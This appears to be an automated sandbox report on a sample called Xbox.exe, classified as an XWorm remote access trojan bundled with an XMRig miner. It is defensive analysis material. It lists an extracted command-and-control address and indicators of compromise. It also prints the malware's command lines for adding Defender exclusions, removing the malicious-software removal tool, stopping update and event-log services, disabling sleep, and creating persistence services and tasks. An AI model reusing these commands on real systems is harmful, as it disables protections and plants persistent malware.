xmrig | 7022aee75dbf84ea8b3050fcee637f6f87232dfab7cb7cbd5f5a2062d749c07c

Analysis

max time kernel
149s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/08/2024, 15:24

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Xbox.exe
Size

19.0MB
MD5

30880523d777f4fe75ca515c0d6df32b
SHA1

73629571c0c7f6bfae8422ff44d79b48e2e13d1f
SHA256

7022aee75dbf84ea8b3050fcee637f6f87232dfab7cb7cbd5f5a2062d749c07c
SHA512

1276a39236434cb7fc4903f2b75f1f6dceb1522aba70ff2babf70bae7088caeb5463f6f405e8bac51f2b1378c12291828dfa0978aaf009821cf87385d9824f81
SSDEEP

196608:Yb61gbgwY5kuaC4FaXtBrlOMOpnLo213diio7eLi4iUK+cTwfnrUzhjzO5quL971:Yo487OsOcTwfOa5L93edRaF/

Score

10^/10

xmrig xworm discovery evasion execution miner persistence rat trojan upx

Malware Config

Extracted

Family

xworm

expected-schema.gl.at.ply.gg:2980

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral3/memory/3092-37-0x0000000005360000-0x0000000005378000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral3/memory/2312-262-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-264-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-267-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-268-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-265-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-266-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-261-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-275-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-276-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-280-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-281-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2312-282-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
904	powershell.exe
532	powershell.exe
2624	powershell.exe
2296	powershell.exe
4980	powershell.exe
4688	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Xbox.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	flux.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	flux.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	flux.exe

Executes dropped EXE 6 IoCs

pid	Process
400	build.exe
3092	flux.exe
1560	XboxInstaller.exe
4340	gaexyjbdzroy.exe
3576	XClient.exe
3048	XClient.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/2312-256-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-260-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-262-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-257-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-264-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-267-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-268-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-265-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-266-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-261-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-259-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-258-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-275-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-276-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-280-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-281-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2312-282-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	flux.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	XboxInstaller.exe
File opened (read-only)	\??\Y:	XboxInstaller.exe
File opened (read-only)	\??\H:	XboxInstaller.exe
File opened (read-only)	\??\M:	XboxInstaller.exe
File opened (read-only)	\??\V:	XboxInstaller.exe
File opened (read-only)	\??\W:	XboxInstaller.exe
File opened (read-only)	\??\N:	XboxInstaller.exe
File opened (read-only)	\??\P:	XboxInstaller.exe
File opened (read-only)	\??\R:	XboxInstaller.exe
File opened (read-only)	\??\Z:	XboxInstaller.exe
File opened (read-only)	\??\E:	XboxInstaller.exe
File opened (read-only)	\??\G:	XboxInstaller.exe
File opened (read-only)	\??\K:	XboxInstaller.exe
File opened (read-only)	\??\L:	XboxInstaller.exe
File opened (read-only)	\??\S:	XboxInstaller.exe
File opened (read-only)	\??\T:	XboxInstaller.exe
File opened (read-only)	\??\U:	XboxInstaller.exe
File opened (read-only)	\??\A:	XboxInstaller.exe
File opened (read-only)	\??\B:	XboxInstaller.exe
File opened (read-only)	\??\I:	XboxInstaller.exe
File opened (read-only)	\??\O:	XboxInstaller.exe
File opened (read-only)	\??\J:	XboxInstaller.exe
File opened (read-only)	\??\Q:	XboxInstaller.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4408	powercfg.exe
1824	powercfg.exe
3620	powercfg.exe
3748	powercfg.exe
5080	powercfg.exe
4484	powercfg.exe
1736	powercfg.exe
4300	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	build.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	gaexyjbdzroy.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4340 set thread context of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 set thread context of 2312	4340	gaexyjbdzroy.exe	156

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2404	sc.exe
2740	sc.exe
4868	sc.exe
1864	sc.exe
1752	sc.exe
3448	sc.exe
2720	sc.exe
4080	sc.exe
992	sc.exe
2988	sc.exe
1960	sc.exe
4964	sc.exe
3272	sc.exe
4424	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XboxInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	flux.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4600	timeout.exe

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4900	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
904	powershell.exe
904	powershell.exe
532	powershell.exe
532	powershell.exe
2624	powershell.exe
2624	powershell.exe
2296	powershell.exe
2296	powershell.exe
400	build.exe
4980	powershell.exe
4980	powershell.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
400	build.exe
4340	gaexyjbdzroy.exe
4688	powershell.exe
4688	powershell.exe
3092	flux.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
4340	gaexyjbdzroy.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe
2312	explorer.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	3092	flux.exe
Token: SeShutdownPrivilege	1560	XboxInstaller.exe
Token: SeCreatePagefilePrivilege	1560	XboxInstaller.exe
Token: SeDebugPrivilege	904	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeShutdownPrivilege	3620	powercfg.exe
Token: SeCreatePagefilePrivilege	3620	powercfg.exe
Token: SeShutdownPrivilege	5080	powercfg.exe
Token: SeCreatePagefilePrivilege	5080	powercfg.exe
Token: SeShutdownPrivilege	3748	powercfg.exe
Token: SeCreatePagefilePrivilege	3748	powercfg.exe
Token: SeShutdownPrivilege	4484	powercfg.exe
Token: SeCreatePagefilePrivilege	4484	powercfg.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	3092	flux.exe
Token: SeShutdownPrivilege	1736	powercfg.exe
Token: SeCreatePagefilePrivilege	1736	powercfg.exe
Token: SeShutdownPrivilege	4300	powercfg.exe
Token: SeCreatePagefilePrivilege	4300	powercfg.exe
Token: SeShutdownPrivilege	1824	powercfg.exe
Token: SeCreatePagefilePrivilege	1824	powercfg.exe
Token: SeShutdownPrivilege	4408	powercfg.exe
Token: SeCreatePagefilePrivilege	4408	powercfg.exe
Token: SeLockMemoryPrivilege	2312	explorer.exe
Token: SeDebugPrivilege	3576	XClient.exe
Token: SeDebugPrivilege	3048	XClient.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3092	flux.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 4216 wrote to memory of 400	4216	Xbox.exe	86
PID 4216 wrote to memory of 400	4216	Xbox.exe	86
PID 4216 wrote to memory of 3092	4216	Xbox.exe	87
PID 4216 wrote to memory of 3092	4216	Xbox.exe	87
PID 4216 wrote to memory of 3092	4216	Xbox.exe	87
PID 4216 wrote to memory of 1560	4216	Xbox.exe	88
PID 4216 wrote to memory of 1560	4216	Xbox.exe	88
PID 4216 wrote to memory of 1560	4216	Xbox.exe	88
PID 3092 wrote to memory of 904	3092	flux.exe	90
PID 3092 wrote to memory of 904	3092	flux.exe	90
PID 3092 wrote to memory of 904	3092	flux.exe	90
PID 3092 wrote to memory of 532	3092	flux.exe	92
PID 3092 wrote to memory of 532	3092	flux.exe	92
PID 3092 wrote to memory of 532	3092	flux.exe	92
PID 3092 wrote to memory of 2624	3092	flux.exe	94
PID 3092 wrote to memory of 2624	3092	flux.exe	94
PID 3092 wrote to memory of 2624	3092	flux.exe	94
PID 3092 wrote to memory of 2296	3092	flux.exe	96
PID 3092 wrote to memory of 2296	3092	flux.exe	96
PID 3092 wrote to memory of 2296	3092	flux.exe	96
PID 220 wrote to memory of 1820	220	cmd.exe	106
PID 220 wrote to memory of 1820	220	cmd.exe	106
PID 3092 wrote to memory of 4900	3092	flux.exe	123
PID 3092 wrote to memory of 4900	3092	flux.exe	123
PID 3092 wrote to memory of 4900	3092	flux.exe	123
PID 4312 wrote to memory of 3264	4312	cmd.exe	140
PID 4312 wrote to memory of 3264	4312	cmd.exe	140
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 4020	4340	gaexyjbdzroy.exe	151
PID 4340 wrote to memory of 2312	4340	gaexyjbdzroy.exe	156
PID 4340 wrote to memory of 2312	4340	gaexyjbdzroy.exe	156
PID 4340 wrote to memory of 2312	4340	gaexyjbdzroy.exe	156
PID 4340 wrote to memory of 2312	4340	gaexyjbdzroy.exe	156
PID 4340 wrote to memory of 2312	4340	gaexyjbdzroy.exe	156
PID 3092 wrote to memory of 2624	3092	flux.exe	162
PID 3092 wrote to memory of 2624	3092	flux.exe	162
PID 3092 wrote to memory of 2624	3092	flux.exe	162
PID 3092 wrote to memory of 1580	3092	flux.exe	163
PID 3092 wrote to memory of 1580	3092	flux.exe	163
PID 3092 wrote to memory of 1580	3092	flux.exe	163
PID 1580 wrote to memory of 4600	1580	cmd.exe	166
PID 1580 wrote to memory of 4600	1580	cmd.exe	166
PID 1580 wrote to memory of 4600	1580	cmd.exe	166

C:\Users\Admin\AppData\Local\Temp\Xbox.exe
"C:\Users\Admin\AppData\Local\Temp\Xbox.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4216
- C:\Users\Public\build.exe
  "C:\Users\Public\build.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:400
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:220
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1820
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3448
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1960
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1864
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:2720
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:4080
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3620
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4484
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3748
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "LNETTCDY"
    3⤵
    - Launches sc.exe
    PID:4424
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "LNETTCDY" binpath= "C:\ProgramData\jqznuyxniafn\gaexyjbdzroy.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4964
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:992
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "LNETTCDY"
    3⤵
    - Launches sc.exe
    PID:4868
- C:\Users\Public\flux.exe
  "C:\Users\Public\flux.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\flux.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'flux.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:532
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4900
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /delete /f /tn "XClient"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpADEA.tmp.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:4600
- C:\Users\Public\XboxInstaller.exe
  "C:\Users\Public\XboxInstaller.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1560

C:\ProgramData\jqznuyxniafn\gaexyjbdzroy.exe
C:\ProgramData\jqznuyxniafn\gaexyjbdzroy.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4340
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4688
- C:\Windows\system32\cmd.exe
